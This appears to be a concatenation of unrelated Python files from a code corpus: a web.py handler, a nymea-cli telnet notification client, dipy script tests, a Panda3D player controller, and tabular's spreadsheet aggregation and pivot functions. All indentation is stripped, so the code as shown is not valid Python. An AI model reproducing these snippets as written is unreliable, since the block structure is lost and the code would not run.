web.header('Access-Control-Allow-Headers','Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
data = web.data()
data_dict = {}
try:
data_dict = json.loads(data)
except Exception, e:
print "error parsing json:"+ str(e)
pass
if action=="message":
mind = Mind.singleton(getMindOutput)
try:
for line in data_dict["body"].splitlines():
print line
mind.listen(line)
except Exception as e:
print "Error:"+str(e)
results = []
for output in flushOutput():
results.append({'data': output[1],'action':output[0]})
return json.dumps(results)
if action=="update":
results = []
for output in flushOutput():
results.append({'data': output[1],'action':output[0]})
return json.dumps(results)
else:
return "[]"
if __name__ == "__main__":
print "See: localhost:12010 in browser"
webbrowser.get().open('http://localhost:12010/')
app.run(port=12010)
| gpl-2.0 | -8,180,544,014,247,534,000 | 24.086022 | 109 | 0.672953 | false |
guh/guh-cli | nymea/notifications.py | 1 | 3045 | # -*- coding: UTF-8 -*-
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# Copyright (C) 2015 - 2018 Simon Stuerz <[email protected]> #
# #
# This file is part of nymea-cli. #
# #
# nymea-cli is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, version 2 of the License. #
# #
# nymea-cli is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with nymea-cli. If not, see <http://www.gnu.org/licenses/>. #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import sys
import socket
import json
import select
import telnetlib
import nymea
def notification_sniffer(nymeaHost, nymeaPort):
global commandId
commandId = 0
print "Connecting notification handler..."
try:
tn = telnetlib.Telnet(nymeaHost, nymeaPort)
except :
print "ERROR: notification socket could not connect the to nymea-server. \n"
return None
print "...OK \n"
#enable_notification(notificationSocket)
enable_notification(tn.get_socket())
try:
x = None
while (x !=ord('\n') and x != 27):
socket_list = [sys.stdin, tn.get_socket()]
read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])
for sock in read_sockets:
# notification messages:
if sock == tn.get_socket():
packet = tn.read_until("}\n")
packet = json.loads(packet)
nymea.print_json_format(packet)
elif sock == sys.stdin:
x = sys.stdin.readline()
return None
finally:
tn.close()
print "Notification socket closed."
def enable_notification(notifySocket):
global commandId
params = {}
commandObj = {}
commandObj['id'] = commandId
commandObj['method'] = "JSONRPC.SetNotificationStatus"
params['enabled'] = "true"
commandObj['params'] = params
command = json.dumps(commandObj) + '\n'
commandId = commandId + 1
notifySocket.send(command)
| gpl-2.0 | 2,748,701,511,971,271,000 | 37.544304 | 92 | 0.469951 | false |
maurozucchelli/dipy | dipy/tests/test_scripts.py | 1 | 5495 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
""" Test scripts
If we appear to be running from the development directory, use the scripts in
the top-level folder ``scripts``. Otherwise try and get the scripts from the
path
"""
from __future__ import division, print_function, absolute_import
import sys
import os
import shutil
from os.path import dirname, join as pjoin, isfile, isdir, abspath, realpath
from subprocess import Popen, PIPE
from nose.tools import assert_true, assert_false, assert_equal
import numpy.testing as nt
import nibabel as nib
from nibabel.tmpdirs import InTemporaryDirectory
from dipy.data import get_data
# Need shell to get path to correct executables
USE_SHELL = True
DEBUG_PRINT = os.environ.get('NIPY_DEBUG_PRINT', False)
DATA_PATH = abspath(pjoin(dirname(__file__), 'data'))
def local_script_dir(script_sdir):
# Check for presence of scripts in development directory. ``realpath``
# checks for the situation where the development directory has been linked
# into the path.
below_us_2 = realpath(pjoin(dirname(__file__), '..', '..'))
devel_script_dir = pjoin(below_us_2, script_sdir)
if isfile(pjoin(below_us_2, 'setup.py')) and isdir(devel_script_dir):
return devel_script_dir
return None
LOCAL_SCRIPT_DIR = local_script_dir('bin')
def run_command(cmd, check_code=True):
if not LOCAL_SCRIPT_DIR is None:
# Windows can't run script files without extensions natively so we need
# to run local scripts (no extensions) via the Python interpreter. On
# Unix, we might have the wrong incantation for the Python interpreter
# in the hash bang first line in the source file. So, either way, run
# the script through the Python interpreter
cmd = "%s %s" % (sys.executable, pjoin(LOCAL_SCRIPT_DIR, cmd))
if DEBUG_PRINT:
print("Running command '%s'" % cmd)
proc = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=USE_SHELL)
stdout, stderr = proc.communicate()
if proc.poll() == None:
proc.terminate()
if check_code and proc.returncode != 0:
raise RuntimeError('Command "%s" failed with stdout\n%s\nstderr\n%s\n'
% (cmd, stdout, stderr))
return proc.returncode, stdout, stderr
def test_dipy_peak_extraction():
# test dipy_peak_extraction script
cmd = 'dipy_peak_extraction'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def test_dipy_fit_tensor():
# test dipy_fit_tensor script
cmd = 'dipy_fit_tensor'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def test_dipy_sh_estimate():
# test dipy_sh_estimate script
cmd = 'dipy_sh_estimate'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def assert_image_shape_affine(filename, shape, affine):
assert_true(os.path.isfile(filename))
image = nib.load(filename)
assert_equal(image.shape, shape)
nt.assert_array_almost_equal(image.get_affine(), affine)
def test_dipy_fit_tensor_outputs():
with InTemporaryDirectory() as tmp:
dwi, bval, bvec = get_data("small_25")
# Copy data to tmp directory
shutil.copyfile(dwi, "small_25.nii.gz")
shutil.copyfile(bval, "small_25.bval")
shutil.copyfile(bvec, "small_25.bvec")
# Call script
cmd = ["dipy_fit_tensor", "--mask=none", "small_25.nii.gz"]
out = run_command(" ".join(cmd))
assert_equal(out[0], 0)
# Get expected values
img = nib.load("small_25.nii.gz")
affine = img.get_affine()
shape = img.shape[:-1]
# Check expected outputs
assert_image_shape_affine("small_25_fa.nii.gz", shape, affine)
assert_image_shape_affine("small_25_t2di.nii.gz", shape, affine)
assert_image_shape_affine("small_25_dirFA.nii.gz", shape, affine)
assert_image_shape_affine("small_25_ad.nii.gz", shape, affine)
assert_image_shape_affine("small_25_md.nii.gz", shape, affine)
assert_image_shape_affine("small_25_rd.nii.gz", shape, affine)
with InTemporaryDirectory() as tmp:
dwi, bval, bvec = get_data("small_25")
# Copy data to tmp directory
shutil.copyfile(dwi, "small_25.nii.gz")
shutil.copyfile(bval, "small_25.bval")
shutil.copyfile(bvec, "small_25.bvec")
# Call script
cmd = ["dipy_fit_tensor", "--save-tensor", "--mask=none", "small_25.nii.gz"]
out = run_command(" ".join(cmd))
assert_equal(out[0], 0)
# Get expected values
img = nib.load("small_25.nii.gz")
affine = img.get_affine()
shape = img.shape[:-1]
# Check expected outputs
assert_image_shape_affine("small_25_fa.nii.gz", shape, affine)
assert_image_shape_affine("small_25_t2di.nii.gz", shape, affine)
assert_image_shape_affine("small_25_dirFA.nii.gz", shape, affine)
assert_image_shape_affine("small_25_ad.nii.gz", shape, affine)
assert_image_shape_affine("small_25_md.nii.gz", shape, affine)
assert_image_shape_affine("small_25_rd.nii.gz", shape, affine)
# small_25_tensor saves the tensor as a symmetric matrix following
# the nifti standard.
ten_shape = shape + (1, 6)
assert_image_shape_affine("small_25_tensor.nii.gz", ten_shape,
affine)
| bsd-3-clause | -1,704,001,170,354,622,000 | 35.390728 | 84 | 0.648408 | false |
MJ-meo-dmt/Ecliptic | src/player.py | 1 | 10301 | #!/usr/bin/python
# System imports
import sys, math, os
# Panda imports
from panda3d.core import *
from pandac.PandaModules import *
from direct.actor.Actor import Actor
from direct.interval.IntervalGlobal import *
from direct.task import Task
from direct.showbase.DirectObject import DirectObject
from panda3d.core import BitMask32
from panda3d.bullet import *
from direct.showbase.InputStateGlobal import inputState
# Game imports
from devconfig import *
from globals import *
from gui import *
#---------------------------------------------------------------------#
## Main Player Class.
class Player(object):
"""
Player Class:
This class handels all "Players" in game (Actors)
@method addEntity: Use this to add a created entity to the global entity Dict{}
"""
def __init__(self):
pass
# These are players and other entities
def addEntity(self, entityKey, entityObject):
"""
@param entityKey: Pref the name of the entity
@param entityObject: Pref the name of the created entity
"""
# Add entity to the global enity dict{}
ENTITY[entityKey] = entityObject
## MakePlayer Class
# Will move this class under physics.py so that we have some order.
class MakePlayer(DirectObject):
"""
MakePlayer Class:
This class handels the creation of Players.
Players will be stored in the Entity dict.
"""
def __init__(self):
"""
constructor:
@param name: String_name, for the Player - In game.
@param entityName: String_name for the PC - Player in ENTITY /
dict{} for all uses in code.
"""
self.direction = Vec3(0,0,0)
self.angular_direction = Vec3(0,0,0)
self.speed = 1
self.angular_speed = 3
# Setup Player inventory
self.playerDataStorage = [] # May change
## ADD MOUSE LOOK TASK TO TASKMGR
#taskMgr.add(self.look, 'camera')
# Crouch Flag
self.crouching = False
# Mouse look
self.omega = 0.0
# Setup player input
self.accept('space', self.jump)
self.accept('c', self.crouch) # We need to fix the height
self.accept( "escape",sys.exit )
self.accept('arrow_up', self.up )
self.accept('arrow_down', self.down )
self.accept('arrow_left', self.left )
self.accept('arrow_right', self.right)
self.accept("arrow_up-up", self.idle, ["up"])
self.accept("arrow_down-up", self.idle, ["down"])
self.accept("arrow_left-up", self.idle, ["left"])
self.accept("arrow_right-up", self.idle, ["right"])
#inputState.watchWithModifiers('forward', 'w')
#inputState.watchWithModifiers('left', 'a')
#inputState.watchWithModifiers('reverse', 's')
#inputState.watchWithModifiers('right', 'd')
#inputState.watchWithModifiers('turnLeft', 'q')
#inputState.watchWithModifiers('turnRight', 'e')
# Camera Setup for player
# Get the screen size for the camera controller
self.winXhalf = base.win.getXSize()/2
self.winYhalf = base.win.getYSize()/2
## SETUP CHARACTER AND CHARACTER SHAPE
# Setup Shape
# units = meters
# body height : 1.8 meters
# eyes line : 1.8 - 0.11 meters = 1.69 meters
# h is distance between the centers of the 2 spheres
# w is radius of the spheres
# 1.8 = 0.3 + 1.2 + 0.3
# center : 1.8/2 = 0.9
# camera height : 1.69-0.9 = 0.79
h = 1.2
w = 0.3
        # Player needs a different setup, same as the Bullet character controller.
        # At the moment force gets added onto the node, making it behave like a ball.
shape = BulletCapsuleShape(w, h , ZUp)
node = BulletRigidBodyNode('Box')
node.setMass(1.0)
node.addShape(shape)
self.node = node
node.setAngularDamping(10)
np = GAMEPLAY_NODES['PLAYER'].attachNewNode(node)
np.setPos(0, 0, 1)
self.arm = np.attachNewNode('arm')
self.arm.setPos(0,0,0.2)
self.np = np
PHYSICS['WORLD'].attachRigidBody(node)
#self.character = BulletCharacterControllerNode(shape, 1, 'Player')
#-------------------------------------------------------------------#
# PLAYER GRAVITY SETTINGS AND FALL SPEED #
#self.character.setGravity(0.87)
#self.character.setFallSpeed(0.3)
#
#-------------------------------------------------------------------#
#self.characterNP = GAMEPLAY_NODES['PLAYER'].attachNewNode(self.character)
#self.characterNP.setPos(0, 0, 2) # May need some tweaking
#self.characterNP.setCollideMask(BitMask32.allOn())
# Attach the character to the base _Physics
#PHYSICS['WORLD'].attachCharacter(self.character)
# Reparent the camera to the player
#base.camera.reparentTo(self.np)
#base.camera.setPos(0,0,0.79)
#base.camLens.setNearFar(camNear,camFar)
base.camLens.setFov(90)
base.disableMouse()
gui = Crosshair()
self.arm = loader.loadModel('../assets/models/test.egg')
screens = self.arm.findAllMatches('**')
self.arm_screen = None
rot = 0
pos = 0
for screen in screens :
if screen.hasTag('screen'):
self.arm_screen = screen
rot = screen.getHpr()
pos = screen.getPos()
print("rotation"+str(rot))
self.actor = Actor('../assets/models/test.egg', {'anim1':'../assets/models/test-Anim0.egg'})
self.actor.reparentTo(self.np)
self.actor.loop('anim1')
self.actor.setPos(.0,-0.1,0.4)
self.actor.setH(180)
self.actor.node().setBounds(OmniBoundingVolume())
self.actor.node().setFinal(True)
#self.actor.setTwoSided(True)
#self.actor.reparentTo(self.world.buffer_system.geom_cam)
#self.actor.hide(self.world.buffer_system.light_mask)
# attach smth to hand
picker = self.actor.exposeJoint(None,"modelRoot","hand_picker")
arm_bone = self.actor.exposeJoint(None,"modelRoot","screen_picker")
self.arm_screen.reparentTo(arm_bone)
self.arm_screen.setH(self.arm_screen.getH()+90)
self.temp_animate = self.arm_screen
self.picker = picker
taskMgr.add(self.update,'update player position')
# Player Debug:
#print ""
#print "Player Character controller settings: "
#print ""
#print "Character Gravity: ", self.character.getGravity()
#print "Character Max Slope: ",self.character.getMaxSlope()
#print ""
def up(self):
self.direction += Vec3(0,1,0)
self.angular_direction += Vec3(1,0,0)
def down(self):
self.direction += Vec3(0,-1,0)
def left(self):
self.direction += Vec3(-1,0,0)
def right(self):
self.direction += Vec3(1,0,0)
def idle(self, key):
if(key == "up"):
self.direction -= Vec3(0,1,0)
self.angular_direction -= Vec3(1,0,0)
elif(key == "down"):
self.direction -= Vec3(0,-1,0)
elif(key == "left"):
self.direction -= Vec3(-1,0,0)
elif(key == "right"):
self.direction -= Vec3(1,0,0)
# Handle player jumping
def jump(self):
self.character.setMaxJumpHeight(2.3)
self.character.setJumpSpeed(4.5)
self.character.doJump()
    # Handle player crouch. (Currently buggy.)
def crouch(self):
self.crouching = not self.crouching
sz = self.crouching and 0.6 or 1.0
#self.character.getShape().setLocalScale(Vec3(1, 1, sz))
self.characterNP.setScale(Vec3(1, 1, sz) * 0.3048)
#self.characterNP.setPos(0, 0, -1 * sz)
# Handle player mouse
def look(self, task):
dt = globalClock.getDt()
# Handle mouse
md = base.win.getPointer(0)
x = md.getX()
y = md.getY()
if base.win.movePointer(0, self.winXhalf, self.winYhalf):
self.omega = (x - self.winXhalf)*-mouseSpeed
base.camera.setP( (clampScalar(-90,90, base.camera.getP() - (y - self.winYhalf)*0.09)) )
self.processInput(dt)
return task.cont
def update(self,task):
dt = globalClock.getDt()
self.np.setPos(self.np,self.direction * dt * self.speed)
base.camera.setPos(self.np.getPos()+ Vec3(0,0,0.79))
md = base.win.getPointer(0)
x = md.getX()
y = md.getY()
if base.win.movePointer(0, self.winXhalf, self.winYhalf):
base.camera.setP(base.camera.getP() - (y - self.winYhalf)*dt*self.angular_speed)
self.np.setH(self.np.getH() - (x - self.winXhalf)*dt*self.angular_speed)
base.camera.setH(self.np.getH())
base.camera.setR(self.np.getR())
self.node.setAngularFactor(0)
self.node.setAngularVelocity(0)
BUFFER_SYSTEM['main'].reflection_cube.setPos(base.camera.getPos())
BUFFER_SYSTEM['main'].reflection_cube.setHpr(base.camera.getHpr())
return task.cont
# Handle player input
def processInput(self, dt):
print(self.direction)
speed = Vec3(0, 0, 0)
#@param PCSpeed: Player move speed under devconfig.py
if inputState.isSet('forward'): speed.setY( PCSpeed)
if inputState.isSet('reverse'): speed.setY(-PCSpeed)
if inputState.isSet('left'): speed.setX(-PCSpeed)
if inputState.isSet('right'): speed.setX( PCSpeed)
self.character.setAngularMovement(self.omega)
self.character.setLinearMovement(speed, True)
| bsd-3-clause | 5,954,991,454,922,168,000 | 31.701587 | 101 | 0.558878 | false |
yamins81/tabular | tabular/spreadsheet.py | 1 | 57202 | """
Spreadsheet-style functions for NumPy ndarray with structured dtype or
recarray objects:
aggregate, aggregate_in, pivot, addrecords, addcols, deletecols, renamecol,
replace, colstack, rowstack, join, strictjoin, nullvalue
Note that these functions are also wrapped as methods of the tabular tabarray
object, which is a subclass of the numpy ndarray.
**See Also:**
:class:`tabular.tab.tabarray`
"""
__all__ = ['aggregate', 'aggregate_in', 'pivot', 'addrecords', 'addcols',
'deletecols', 'renamecol', 'replace', 'colstack', 'rowstack',
'join', 'strictjoin', 'DEFAULT_RENAMER']
import numpy as np
import types
import tabular.utils as utils
import tabular.fast as fast
from tabular.colors import GrayScale
def isftype(x):
    a = isinstance(x, types.FunctionType)
    b = isinstance(x, types.BuiltinFunctionType)
    c = isinstance(x, types.MethodType)
    d = isinstance(x, types.BuiltinMethodType)
    return a or b or c or d
def aggregate(X, On=None, AggFuncDict=None, AggFunc=None,
AggList=None, returnsort=False, KeepOthers=True,
keyfuncdict=None):
"""
    Aggregate an ndarray with structured dtype (or recarray) on specified
    columns, using given aggregation functions.
Aggregate a numpy recarray (or tabular tabarray) on a set of specified
factors, using specified aggregation functions.
Intuitively, this function will aggregate the dataset `X` on a set of
columns, whose names are listed in `On`, so that the resulting aggregate
data set has one record for each unique tuples of values in those columns.
The more factors listed in `On` argument, the "finer" is the aggregation,
the fewer factors, the "coarser" the aggregation. For example, if::
On = 'A'
the resulting tabarray will have one record for each unique value of a in
X['A'], while if On = ['A', 'B'] then the resulting tabarray will have
one record for each unique (a, b) pair in X[['A', 'B']]
The `AggFunc` argument is a function that specifies how to aggregate the
    factors _not_ listed in `On`, e.g. the so-called `Off` columns.  For
    instance, if On = ['A', 'B'] and `C` is a third column, then ::
AggFunc = numpy.mean
will result in a tabarray containing a `C` column whose values are the
average of the values from the original `C` columns corresponding to each
unique (a, b) pair.
    If you want to specify a different aggregation method for each `Off` column,
use `AggFuncDict` instead of AggFunc. `AggFuncDict` is a dictionary of
functions whose keys are column names. AggFuncDict[C] will be applied to
the C column, AggFuncDict[D] to the D column, etc. AggFunc and AggFuncDict
can be used simultaneously, with the elements of AggFuncDict overriding
AggFunc for the specified columns.
Using either AggFunc or AggFuncDict, the resulting tabarray has the same
    columns as the original tabarray.  Sometimes you want to create new
    aggregate columns that do not correspond to a single column in the
    original tabarray, but instead draw on data from several.  To achieve
    this, use the AggList argument.  AggList is a list of three-element
    tuples of the form:
(name, func, col_names)
where `name` specifies the resulting column name in the aggregated tabarray,
`func` specifies the aggregation function, and `col_names` specifies the
list of columns names from the original tabarray that will be needed to
compute the aggregate values. (That is, for each unique tuple `t` in the `On`
columns, the subarray of X[col_names] for which X[On] == t is passed to
`func`.)
If an `Off` column is _not_ provided as a key in `AggFuncDict`, a default
aggregator function will be used: the sum function for numerical columns,
concatenation for string columns.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.aggregate`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The data set to aggregate.
**On** : string or list of strings, optional
List of column names in `X`.
**AggFuncDict** : dictionary, optional
Dictionary where
* keys are some (all) column names of `X` that are NOT
in `On`
* values are functions that can be applied to lists or
numpy arrays.
This specifies how to aggregate the factors _not_ listed in
`On`, e.g. the so-called `Off` columns.
**AggFunc** : function, optional
Function that can be applied to lists or numpy arrays,
specifying how to aggregate factors not listed in either
`On` or the keys of `AggFuncDict`, e.g. a "default"
aggregation function for the `Off` columns not explicitly
listed in `AggFuncDict`.
**AggList** : list, optional
            List of (name, func, col_names) tuples, as described above.
**returnsort** : Boolean, optional
If `returnsort == True`, then return a list of indices
describing how `X` was sorted as a result of aggregation.
Default value is `False`.
**Returns**
**agg** : numpy ndarray with structured dtype
Aggregated data set.
**index_array** : numpy ndarray (int, 1D)
Returned only if `returnsort == True`. List of indices
describing how `X` was sorted as a result of aggregation.
**See also:**
:func:`tabular.spreadsheet.aggregate_in`
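    **Example**
        A minimal usage sketch; the column names and data below are invented
        purely for illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('x', 1, 2.0), ('x', 2, 3.0),
                                    ('y', 5, 1.0)],
                                   names=['A', 'B', 'C'])
            # one record per unique value of 'A'; by default the numeric
            # columns 'B' and 'C' are summed within each group
            agg = spreadsheet.aggregate(X, On=['A'])
            # an explicit per-column aggregator, e.g. the mean of 'C'
            agg2 = spreadsheet.aggregate(X, On=['A'],
                                         AggFuncDict={'C': np.mean})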
"""
names = X.dtype.names
if len(X) == 0:
if returnsort:
return [X,None]
else:
return X
if On == None:
On = []
elif isinstance(On,str):
On = On.split(',')
assert all([o in names for o in On]), \
("Axes " + str([o for o in On if o not in names]) +
" can't be found.")
if AggList is None:
AggList = []
if AggFuncDict:
AggList += AggFuncDict.items()
for (i,x) in enumerate(AggList):
if utils.is_string_like(x):
AggList[i] = (x,)
elif isinstance(x,tuple):
assert 1 <= len(x) <= 3
assert isinstance(x[0],str)
if len(x) == 2 and isinstance(x[1],tuple):
assert len(x[1]) == 2
AggList[i] = (x[0],) + x[1]
else:
            raise ValueError('Elements of AggList must be strings or tuples.')
Names = [x[0] for x in AggList]
assert Names == utils.uniqify(Names)
if KeepOthers:
AggList = [(x,) for x in X.dtype.names if x not in Names + On] + AggList
DefaultChoices = {'string':[], 'sum':[], 'first':[]}
for (i,v) in enumerate(AggList):
if len(v) == 1:
assert v[0] in X.dtype.names
if AggFunc:
AggList[i] = v + (AggFunc,v[0])
else:
AggList[i] = v + (DefaultChooser(X,v[0], DefaultChoices),v[0])
elif len(v) == 2:
if isftype(v[1]):
assert v[0] in X.dtype.names
AggList[i] = v + (v[0],)
elif utils.is_string_like(v[1]):
if AggFunc:
_a = v[1] in X.dtype.names
_b = isinstance(v[1],list) and set(v[1]) <= set(X.dtype.names)
assert _a or _b
AggList[i] = (v[0], AggFunc, v[1])
else:
assert v[1] in X.dtype.names
AggList[i] = (v[0],
DefaultChooser(X,v[1],
DefaultChoices),
v[1])
else:
                raise ValueError('Second element of AggList entry must be an aggregation function or a column name.')
elif len(v) == 3:
if utils.is_string_like(v[2]):
assert isftype(v[1]) and v[2] in X.dtype.names
else:
assert isftype(v[1]) and \
(isinstance(v[2],list) and \
set(v[2]) <= set(X.dtype.names))
if len(DefaultChoices['sum']) > 0:
print('No aggregation function provided for', DefaultChoices['sum'],
'so assuming "sum" by default.')
if len(DefaultChoices['string']) > 0:
print('No aggregation function provided for', DefaultChoices['string'],
'so assuming string concatenation by default.')
if len(DefaultChoices['first']) > 0:
print('No aggregation function provided for', DefaultChoices['first'],
'and neither summing nor concatenation works, so choosing '
'first value by default.')
return strictaggregate(X, On, AggList, returnsort, keyfuncdict)
def DefaultChooser(X,o,DC):
try:
sum(X[o][0:1])
DC['sum'].append(o)
return sum
except:
try:
''.join(X[o][0:1])
DC['string'].append(o)
return ''.join
except:
DC['first'].append(o)
return lambda x : x[0]
def strictaggregate(X,On,AggList,returnsort=False, keyfuncdict=None):
if len(On) > 0:
#if len(On) == 1:
# keycols = X[On[0]]
#else:
# keycols = X[On]
keycols = X[On]
if keyfuncdict is not None:
for _kf in keyfuncdict:
fn = keyfuncdict[_kf]
keycols[_kf] = np.array(map(fn, keycols[_kf]))
[D, index_array] = fast.recarrayuniqify(keycols)
X = X[index_array]
Diffs = np.append(np.append([-1], D[1:].nonzero()[0]), [len(D)])
else:
Diffs = np.array([-1, len(X)])
argcounts = dict([(o,
f.func_code.co_argcount - (len(f.func_defaults) if \
f.func_defaults != None else 0) if 'func_code' in dir(f) else 1)
for (o,f,g) in AggList])
OnCols = utils.fromarrays([X[o][Diffs[:-1]+1] for o in On],
type=np.ndarray, names=On)
AggColDict = dict([(o,
[f(X[g][Diffs[i]+1:Diffs[i+1]+1]) if argcounts[o] == 1 else \
f(X[g][Diffs[i]+1:Diffs[i+1]+1],X) for i in range(len(Diffs) - 1)]) \
for (o,f,g) in AggList])
if isinstance(AggColDict[AggList[0][0]][0],list) or \
isinstance(AggColDict[AggList[0][0]][0],np.ndarray):
lens = map(len, AggColDict[AggList[0][0]])
OnCols = OnCols.repeat(lens)
for o in AggColDict.keys():
AggColDict[o] = utils.listunion(AggColDict[o])
Names = [v[0] for v in AggList]
AggCols = utils.fromarrays([AggColDict[o] for o in Names],
type=np.ndarray, names=Names)
if returnsort:
return [colstack([OnCols,AggCols]),index_array]
else:
return colstack([OnCols,AggCols])
def aggregate_in(Data, On=None, AggFuncDict=None, AggFunc=None, AggList=None,
interspersed=True):
"""
    Aggregate an ndarray with structured dtype or recarray
and include original data in the result.
Take aggregate of data set on specified columns, then add the resulting
rows back into data set to make a composite object containing both original
non-aggregate data rows as well as the aggregate rows.
First read comments for :func:`tabular.spreadsheet.aggregate`.
This function returns a numpy ndarray, with the number of rows equaling::
len(Data) + len(A)
where `A` is the the result of::
Data.aggregate(On,AggFuncDict)
`A` represents the aggregate rows; the other rows were the original data
rows.
This function supports _multiple_ aggregation, meaning that one can first
aggregate on one set of factors, then repeat aggregation on the result for
another set of factors, without the results of the first aggregation
    interfering with the second. To achieve this, the method adds two new columns:
* a column called "__aggregates__" specifying on which factors the rows
that are aggregate rows were aggregated. Rows added by aggregating on
factor `A` (a column in the original data set) will have `A` in the
"__aggregates__" column. When multiple factors `A1`, `A2` , ... are
aggregated on, the notation is a comma-separated list: `A1,A2,...`.
This way, when you call `aggregate_in` again, the function only
aggregates on the columns that have the empty char '' in their
"__aggregates__" column.
* a column called '__color__', specifying Gray-Scale colors for
aggregated rows that will be used by the Data Environment system
browser for colorizing the data. When there are multiple levels of
aggregation, the coarser aggregate groups (e.g. on fewer factors) get
darker gray color then those on finer aggregate groups (e.g. more
factors).
Implemented by the tabarray method
:func:`tabular.tab.tabarray.aggregate_in`.
**Parameters**
**Data** : numpy ndarray with structured dtype or recarray
The data set to aggregate in.
**On** : list of strings, optional
List of column names in `X`.
**AggFuncDict** : dictionary, optional
Dictionary where
* keys are some (all) column names of `X` that are NOT in
`On`
* values are functions that can be applied to lists or
numpy arrays.
This specifies how to aggregate the factors _not_ listed in
`On`, e.g. the so-called `Off` columns.
**AggFunc** : function, optional
Function that can be applied to lists or numpy arrays,
specifying how to aggregate factors not listed in either
`On` or the keys of `AggFuncDict`, e.g. a "default"
aggregation function for the `Off` columns not explicitly
listed in `AggFuncDict`.
**interspersed** : boolean, optional
* If `True`, aggregate rows are interleaved with the data
of which they are aggregates.
* If `False`, all aggregate rows placed at the end of the
array.
**Returns**
**agg** : numpy ndarray with structured dtype
Composite aggregated data set plus original data set.
**See also:**
:func:`tabular.spreadsheet.aggregate`
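    **Example**
        A minimal usage sketch; the column names and data below are invented
        purely for illustration::
            import numpy as np
            import tabular.spreadsheet as spreadsheet
            X = np.rec.fromrecords([('x', 1), ('x', 2), ('y', 5)],
                                   names=['A', 'B'])
            # original rows plus one aggregate row per unique value of 'A',
            # marked by the added '__aggregates__' and '__color__' columns
            Y = spreadsheet.aggregate_in(X, On=['A'])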
"""
# See if there's an '__aggregates__ column'.
# If so, strip off all those that are nontrivial.
Data = deletecols(Data,'__color__')
if '__aggregates__' in Data.dtype.names:
X = Data[Data['__aggregates__'] == ''][:]
OldAggregates = Data[Data['__aggregates__'] != ''][:]
AggVars = utils.uniqify(utils.listunion([x.split(',') for x in
OldAggregates['__aggregates__']]))
else:
X = Data
OldAggregates = Data[0:0]
AggVars = []
if On == None:
On = []
NewAggregates = aggregate(X, On, AggFuncDict=AggFuncDict,
AggFunc=AggFunc, AggList=AggList, KeepOthers=True)
on = ','.join(On)
NewAggregates = addcols(NewAggregates,
utils.fromarrays([[on]*len(NewAggregates)],
type=np.ndarray, names=['__aggregates__']))
AggVars = utils.uniqify(AggVars + On)
Aggregates = rowstack([OldAggregates,NewAggregates],mode='nulls')
ANLen = np.array([len(x.split(',')) for x in Aggregates['__aggregates__']])
U = np.array(utils.uniqify(ANLen)); U.sort()
[A,B] = fast.equalspairs(ANLen,U)
Grays = np.array(grayspec(len(U)))
AggColor = utils.fromarrays([Grays[A]], type=np.ndarray,
names = ['__color__'])
Aggregates = addcols(Aggregates,AggColor)
if not interspersed or len(AggVars) == 0:
return rowstack([X,Aggregates],mode='nulls')
else:
s = ANLen.argsort()
Aggregates = Aggregates[s[range(len(Aggregates) - 1, -1, -1)]]
X.sort(order = AggVars)
Diffs = np.append(np.append([0], 1 + (X[AggVars][1:] !=
X[AggVars][:-1]).nonzero()[0]), [len(X)])
DiffAtts = ([[t for t in AggVars if X[t][Diffs[i]] != X[t][Diffs[i+1]]]
for i in range(len(Diffs) - 2)]
if len(Diffs) > 2 else []) + [AggVars]
HH = {}
for l in utils.uniqify(Aggregates['__aggregates__']):
Avars = l.split(',')
HH[l] = fast.recarrayequalspairs(X[Avars][Diffs[:-1]],
Aggregates[Avars])
Order = []
for i in range(len(Diffs)-1):
Order.extend(range(Diffs[i], Diffs[i+1]))
Get = []
for l in HH.keys():
Get += [len(X) + j for j in
HH[l][2][range(HH[l][0][i], HH[l][1][i])] if
len(set(DiffAtts[i]).intersection(
Aggregates['__aggregates__'][j].split(','))) > 0 and
set(Aggregates['__aggregates__'][j].split(',')) ==
set(l.split(','))]
Order.extend(Get)
return rowstack([X, Aggregates], mode='nulls')[Order]
def grayspec(k):
"""
List of gray-scale colors in HSV space as web hex triplets.
For integer argument k, returns list of `k` gray-scale colors, increasingly
light, linearly in the HSV color space, as web hex triplets.
Technical dependency of :func:`tabular.spreadsheet.aggregate_in`.
**Parameters**
**k** : positive integer
Number of gray-scale colors to return.
**Returns**
**glist** : list of strings
List of `k` gray-scale colors.
"""
ll = .5
ul = .8
delta = (ul - ll) / k
return [GrayScale(t) for t in np.arange(ll, ul, delta)]
def pivot(X, a, b, Keep=None, NullVals=None, order = None, prefix='_'):
'''
Implements pivoting on numpy ndarrays (with structured dtype) or recarrays.
See http://en.wikipedia.org/wiki/Pivot_table for information about pivot
tables.
Returns `X` pivoted on (a,b) with `a` as the row axis and `b` values as the
column axis.
So-called "nontrivial columns relative to `b`" in `X` are added as
color-grouped sets of columns, and "trivial columns relative to `b`" are
also retained as cross-grouped sets of columns if they are listed in `Keep`
argument.
    Note that a column `c` in `X` is "trivial relative to `b`" if for all rows
    i, X[c][i] can be determined from X[b][i], i.e. each value in X[b]
    corresponds to exactly one value in X[c].
    The function will raise an exception if the set of pairs of values in
    X[[a,b]] is not the product of the individual columns' value sets, i.e.::
X[[a,b]] == set(X[a]) x set(X[b])
in some ordering.
Implemented by the tabarray method :func:`tabular.tab.tabarray.pivot`
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The data set to pivot.
**a** : string
Column name in `X`.
**b** : string
Another column name in `X`.
**Keep** : list of strings, optional
List of other columns names in `X`.
**NullVals** : optional
